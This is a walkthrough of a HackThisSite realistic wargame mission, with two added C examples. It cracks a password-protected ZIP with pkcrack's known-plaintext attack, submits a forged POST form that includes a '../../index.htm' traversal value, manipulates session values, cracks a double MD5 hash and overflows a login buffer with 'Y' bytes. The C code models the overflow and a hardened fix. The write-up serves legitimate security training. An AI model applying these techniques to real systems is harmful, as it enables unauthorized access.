BUFFER OVERFLOW, COOKIE MANIPULATION, ZIP & HASH CRACKING
I don't have much time for writing up tutorials. I will try to come back and improve this article later. The point is:
I heard about him; he is the kind who locks the front door twice and leaves the back door open.
I don't really know what this good-sounding point means. The method is similar to the previous ones, but the way many of the methods are implemented makes this mission really hard. We study the source code and find the following link.
Download the file backup.zip from there. You can open the zip and view the filenames, but you cannot extract it, as it is password protected. Luckily, for every problem there is a solution, and this is where pkcrack comes in. pkcrack implements a known-plaintext attack against the traditional PKZIP encryption: to crack the ZIP, it needs at least one of the files inside the archive in its original, unencrypted form. So, with that in mind, open the ZIP in WinZip or whatever you use and see what you can find. Well, look here: the archive contains "index.htm", and that file is available in its original form on the site. Great, the problem just got a lot less tricky. So go to
and use File -> Save / Save Page As to save it. I don't know about Internet Explorer, but in Firefox you need to save it as "Web page, HTML only", not "Web page, complete", because the "complete" option rewrites the links in the HTML and the bytes would no longer match the copy in the archive. The size of the file should be exactly 4423 bytes. If it is not, you did something wrong; try saving the page a different way. You can also use wget, although I don't really like it.
OK, so now you have the page saved at the correct size. Now comes the tricky part. The PKZIP cipher encrypts the compressed data, not the raw file, so pkcrack needs the plaintext compressed into a byte-for-byte identical deflate stream. In practice that means compressing the file you downloaded so that the compressed entry is exactly 1245 bytes. I know this is the part where many of you get stuck. So go ahead and compress it.
What I used: Winace v2.65
Compress it using normal compression, and if the size does not come out right, change the compression method or level. Try them all; there aren't that many.
An important note: every time you compress the file and want to check the size, do NOT look at the file size in Properties. That is the size of the whole archive, headers and central directory included. Open it in WinZip, WinAce or whatever and read the compressed ("packed") size of the entry in there. This part is simple, but it had me stuck for a while.
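To make the note above concrete, here is an added example (not from the write-up and not pkcrack's own code): a small walker over ZIP local file headers that reports each entry's compressed size, method and encryption flag, and compares the plaintext archive's entry against the encrypted one. The sample archives are constructed in the code (filler bytes stand in for real deflate output); the entry names and all sizes other than 1245/4423 are assumptions modelled on the mission's backup.zip and index.zip. One detail worth knowing when comparing sizes: traditional PKZIP encryption prepends a 12-byte header that is counted in an encrypted entry's compressed size, so the check strips it.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the write-up or from pkcrack. Walks the local file
 * headers of a ZIP and reports the fields pkcrack cares about per entry. */
struct zip_entry {
    char name[64];
    int encrypted;        /* general-purpose flag bit 0 */
    unsigned method;      /* 0 = stored, 8 = deflate */
    unsigned long csize;  /* compressed size as recorded in the local header */
};

static unsigned get16(const unsigned char *p) { return p[0] | (p[1] << 8); }
static unsigned long get32(const unsigned char *p)
{ return p[0] | ((unsigned long)p[1] << 8) | ((unsigned long)p[2] << 16) | ((unsigned long)p[3] << 24); }
static void put16(unsigned char *p, unsigned v) { p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; }
static void put32(unsigned char *p, unsigned long v) { put16(p, v & 0xffff); put16(p + 2, (v >> 16) & 0xffff); }

/* Walk consecutive local headers (signature PK\3\4) until something else or the
 * end of the buffer. Entries that defer their sizes to a data descriptor (flag
 * bit 3) are not handled here: their sizes only live in the central directory. */
size_t zip_list(const unsigned char *buf, size_t len, struct zip_entry *out, size_t max)
{
    size_t off = 0, n = 0;
    while (n < max && off + 30 <= len && get32(buf + off) == 0x04034b50UL) {
        const unsigned char *h = buf + off;
        unsigned flag = get16(h + 6), nlen = get16(h + 26), xlen = get16(h + 28);
        unsigned long csize = get32(h + 18);
        if ((flag & 0x0008) || off + 30 + nlen + xlen + csize > len) break;
        struct zip_entry *e = &out[n++];
        size_t copy = nlen < sizeof e->name - 1 ? nlen : sizeof e->name - 1;
        memcpy(e->name, h + 30, copy);
        e->name[copy] = '\0';
        e->encrypted = flag & 1;
        e->method = get16(h + 8);
        e->csize = csize;
        off += 30 + nlen + xlen + csize;
    }
    return n;
}

/* The size pkcrack has to reproduce: traditional PKZIP encryption prepends a
 * 12-byte header that is counted in an encrypted entry's compressed size. */
long pkcrack_payload_size(const struct zip_entry *e)
{
    return (long)e->csize - (e->encrypted ? 12 : 0);
}

static const struct zip_entry *find_entry(const struct zip_entry *es, size_t n, const char *name)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(es[i].name, name) == 0) return &es[i];
    return NULL;
}

/* 1 when the plaintext archive's entry is unencrypted, uses the same method and
 * has the same payload size as the encrypted one. Necessary, not sufficient: the
 * two deflate streams must be byte-identical, and equal length only hints at that. */
int plaintext_size_matches(const unsigned char *crypt, size_t clen, const char *cname,
                           const unsigned char *plain, size_t plen, const char *pname)
{
    struct zip_entry ce[8], pe[8];
    size_t cn = zip_list(crypt, clen, ce, 8), pn = zip_list(plain, plen, pe, 8);
    const struct zip_entry *c = find_entry(ce, cn, cname), *p = find_entry(pe, pn, pname);
    if (!c || !p || !c->encrypted || p->encrypted || c->method != p->method) return 0;
    return pkcrack_payload_size(c) == pkcrack_payload_size(p);
}

/* Constructed sample data: one deflate local header plus csize filler bytes
 * (uncompressed size and CRC are left 0; nothing here consults them). */
static size_t put_entry(unsigned char *o, const char *name, int enc, unsigned long csize)
{
    size_t nlen = strlen(name);
    memset(o, 0, 30);
    put32(o, 0x04034b50UL);
    put16(o + 6, enc ? 1 : 0);   /* flag bit 0: traditional encryption */
    put16(o + 8, 8);             /* deflate */
    put32(o + 18, csize);
    put16(o + 26, (unsigned)nlen);
    memcpy(o + 30, name, nlen);
    memset(o + 30 + nlen, 'x', csize);
    return 30 + nlen + csize;
}

/* Stand-in for backup.zip: two encrypted entries, index.htm deflating to 1245
 * bytes plus the 12-byte header. The second entry's size is an assumption. */
static size_t build_backup(unsigned char *b)
{
    size_t n = put_entry(b, "misc/index.htm", 1, 1245 + 12);
    return n + put_entry(b + n, "shell.php", 1, 900 + 12);
}

size_t demo_backup_entries(void)
{
    static unsigned char b[4096];
    struct zip_entry e[8];
    return zip_list(b, build_backup(b), e, 8);
}

/* Stand-in for index.zip compressed to plain_csize bytes: 1245 matches, others do not. */
int demo_size_check(unsigned long plain_csize)
{
    static unsigned char b[4096], p[2048];
    size_t bl = build_backup(b), pl = put_entry(p, "index.htm", 0, plain_csize);
    return plaintext_size_matches(b, bl, "misc/index.htm", p, pl, "index.htm");
}

int main(void)
{
    printf("backup entries: %zu\n", demo_backup_entries());
    printf("index.zip at 1245 bytes: %s\n", demo_size_check(1245) ? "size matches" : "mismatch");
    printf("index.zip at 1250 bytes: %s\n", demo_size_check(1250) ? "size matches" : "mismatch");
    return 0;
}
```

Point the walker at a real archive and the numbers it prints are the ones to compare, not the file size in Properties; when the plaintext entry's size is off, it is the compression settings that need changing, not the file you saved.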
Now that the file is ZIPed to the correct size (1245), we can continue with pkcrack. First, put the ZIPed file and backup.zip in the pkcrack folder. Open cmd and cd your way to the pkcrack folder, type pkcrack and hit Enter, and you will see the syntax you need to use. For a better explanation, read the pkcrack manual; it is in the doc folder. Still in cmd, type:
|pkcrack -C passwordprotectedzip -c thefileinthezipthatyouhavedownloadedfromthesite -P theplaintextzip -p thefileinthezipthatyouhavezippedto1245bytes -d Unzipped.zip -*|
Here are the details:
|-C is the password-protected ZIP file (backup.zip).
-c is the file in that ZIP that is available in plaintext (index.htm).
-P is the ZIP containing the file ZIPed to 1245 bytes.
-p is the file in the plaintext ZIP (the one ZIPed to 1245 bytes).
-d is the decrypted ZIP file that pkcrack will create if it cracks the encrypted ZIP successfully.
-* the * stands for a further option letter.|
To find out which one, read your pkcrack manual. This option is very important; without it I couldn't unzip the ZIP. OK, here is the spoiler:
|pkcrack -C backup.zip -c "misc (files from different folders)/index.htm" -P index.zip -p index.htm -d result.zip -a -i|
I saved the index.htm and compressed it as index.zip. Now result.zip is created; just extract it. We get a folder "internal_messages" which contains "internal_messages.php", so we head to
Now, in the source code of index.htm, we get the name of the web admin in a meta tag:
|<meta name="Author" content="webadmin: Susy Slack, email firstname.lastname@example.org">|
Now create an HTML page with the code below:
|<form action="http://www.hackthissite.org/missions/realistic/15/internal_messages/msgauth.php" method="POST">
<input name="msg_password" value="Susy Slack," type="text">
<input name="msg_username" value="admin" type="text">
<input name="filename" value="../../index.htm" type="text">
<input type="submit" value="send">
</form>|
Note that the filename field points back at ../../index.htm, the page whose meta tag gave us the name we use as the password. Open the page and submit; you get "set admin OK", which means your $_SESSION has been set to "OK". Now go ahead and read the admin's message, so we again head to
and enter the admin password "Susy Slack" and read the message:
I added a more secure authentication-check script in the admin_area directory, and I stored a file with the source code there. Check it if you want to. You will see it's ultra secure.
And so we now go to
It shows "Forbidden", and here the name of another file from the decrypted archive, "shell.php", comes into play.
Now enter the following as the username:
|User name : $fromEmail|
Leave the password field blank and press OK. It will show you an error. Refresh the page and enter the following:
|User name : fromEmail|
Leave the password field blank and press OK again. It will show another error; refresh the page again and enter:
|User name : shellPswd_root|
This gives you a double MD5 hash: cracking the MD5 yields another MD5, which you crack again to get the password "foobar". Now hit refresh and enter:
|User name : root|
And you're in. It's a Linux terminal. Type "ls" to list the files in the directory. You see two files in admin_area named "test" and "viewpatents.php". Go to
Download the file "chkuserpass.c.zip". Studying the C program in the zip, you find the special character needed to overflow the buffer in the login page, "Y", in the following bit of the program:
|if (strcmp(mymd5(concatenated), hash) == 0)
    is_pass_correct = 'Y';|
Now go to the page:
Enter a run of capital "Y"s in the username field and click "submit", leaving the password field blank. The overflow spills past the username buffer into is_pass_correct, and since every spilled byte is 'Y', the flag ends up holding exactly the value the check tests for, whatever the hash comparison decided. We started brute-forcing from 200 Ys and found that 228 Ys works here perfectly.
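The following is an added example, not the mission's chkuserpass.c: a self-contained model of the bug and of its fix. The buffer sizes, the frame layout and the stored secret (a plain string standing in for the MD5 the real program compares) are assumptions; what it shows is why a run of 'Y' bytes is enough. The locals are placed in a struct in declaration order, as they would sit in a stack frame, so the spill from the username buffer into the flag is deterministic and visible; the shortest payload that works is one byte more than the flag's offset, which is the same thing the write-up found by trying lengths from 200 upwards.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the mission's chkuserpass.c: sizes, layout and SECRET are
 * assumptions chosen to show how an unbounded copy into a buffer that sits just
 * below the result flag lets a run of 'Y' bytes set the flag directly. */
#define USER_MAX 32
#define PASS_MAX 32
#define SECRET   "adminletmein"   /* stands in for the stored MD5 of user+pass */

/* Locals of the check laid out in declaration order, as a stack frame would be:
 * the two fixed buffers, then the one-byte flag the final decision reads. */
struct login_frame {
    char username[USER_MAX];
    char password[PASS_MAX];
    char is_pass_correct;
    char beyond[8];   /* room for the spilled NUL; a real frame holds saved registers here */
};

size_t flag_offset(void) { return offsetof(struct login_frame, is_pass_correct); }

/* strcpy()-style copy with no length check, written through the frame's byte
 * view so the spill into the neighbouring fields is observable. Payloads must
 * stay shorter than sizeof(struct login_frame) to remain inside the object. */
static void unbounded_copy(struct login_frame *f, size_t off, const char *src)
{
    char *dst = (char *)f + off;
    size_t i = 0;
    while (src[i] != '\0') { dst[i] = src[i]; i++; }
    dst[i] = '\0';
}

/* Vulnerable flow, as in the snippet quoted above: copy, concatenate, compare,
 * set 'Y' on a match, then grant access if the flag reads 'Y'. */
int check_login_vuln(const char *user, const char *pass)
{
    struct login_frame f;
    char concatenated[USER_MAX + PASS_MAX + 1];

    memset(&f, 0, sizeof f);
    f.is_pass_correct = 'N';
    unbounded_copy(&f, offsetof(struct login_frame, username), user);  /* the overflow */
    unbounded_copy(&f, offsetof(struct login_frame, password), pass);
    snprintf(concatenated, sizeof concatenated, "%.*s%.*s",
             USER_MAX, f.username, PASS_MAX, f.password);
    if (strcmp(concatenated, SECRET) == 0)
        f.is_pass_correct = 'Y';
    return f.is_pass_correct == 'Y';   /* an overflowed 'Y' passes this test too */
}

static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Hardened flow: reject input that does not fit (NUL included) before copying
 * anything, and decide from the comparison itself rather than from a flag byte
 * that shares the frame with attacker-controlled data. */
int check_login_safe(const char *user, const char *pass)
{
    char concatenated[USER_MAX + PASS_MAX + 1];
    if (bounded_len(user, USER_MAX) >= USER_MAX || bounded_len(pass, PASS_MAX) >= PASS_MAX)
        return 0;
    snprintf(concatenated, sizeof concatenated, "%s%s", user, pass);
    return strcmp(concatenated, SECRET) == 0;
}

/* A run of n 'Y' bytes, the payload the mission uses (capped to fit the frame). */
const char *overflow_payload(size_t n)
{
    static char buf[sizeof(struct login_frame)];
    if (n >= sizeof buf) n = sizeof buf - 1;
    memset(buf, 'Y', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    size_t need = flag_offset() + 1;   /* reach one byte past the buffers */
    printf("flag sits %zu bytes into the frame\n", flag_offset());
    printf("%zu x 'Y', blank password: vulnerable=%d hardened=%d\n", need,
           check_login_vuln(overflow_payload(need), ""),
           check_login_safe(overflow_payload(need), ""));
    printf("%zu x 'Y', blank password: vulnerable=%d hardened=%d\n", need - 1,
           check_login_vuln(overflow_payload(need - 1), ""),
           check_login_safe(overflow_payload(need - 1), ""));
    printf("correct credentials:       vulnerable=%d hardened=%d\n",
           check_login_vuln("admin", "letmein"), check_login_safe("admin", "letmein"));
    return 0;
}
```

With 64 'Y's the terminating NUL lands on the flag and access is denied; with 65 the flag itself becomes 'Y' and the vulnerable check grants access without the password. The hardened version refuses any username that would not fit in its buffer, so the length of the payload never matters.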